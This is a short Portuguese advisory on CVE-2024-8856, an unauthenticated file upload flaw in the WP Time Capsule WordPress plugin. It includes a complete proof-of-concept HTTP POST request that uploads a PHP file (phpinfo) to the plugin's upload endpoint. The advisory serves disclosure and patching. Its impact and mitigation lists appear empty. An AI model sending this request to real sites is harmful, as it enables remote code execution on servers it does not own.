
Vulnerabilidade de Upload Arbitrário de Arquivos no Plugin WP Time Capsule para WordPress
CVE-2024-8856 é uma vulnerabilidade de segurança encontrada no plugin WP Time Capsule para WordPress que permite que usuários não autenticados enviem arquivos arbitrários para o servidor. Isso pode levar à execução remota de código se os arquivos carregados forem executados pelo servidor. A vulnerabilidade decorre de validação insuficiente de arquivos e pode ser explorada enviando requisições especialmente elaboradas para o endpoint vulnerável.
Esta vulnerabilidade permite que usuários não autenticados:
A seguir está uma prova de conceito demonstrando como explorar a vulnerabilidade CVE-2024-8856 enviando uma requisição POST para o endpoint vulnerável.
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close
------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql
<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--
<?php phpinfo();, que exibirá os detalhes de configuração do PHP se executado.Para mitigar essa vulnerabilidade:
CVE-2024-8856 - National Vulnerability Database
CVE-2024-8856 é uma vulnerabilidade grave que exige atenção imediata dos administradores de sites WordPress que utilizam o plugin WP Time Capsule. Devem ser tomadas as devidas precauções para proteger a aplicação contra possíveis explorações. Mantenha-se sempre atualizado quanto às práticas de segurança e às atualizações de plugins.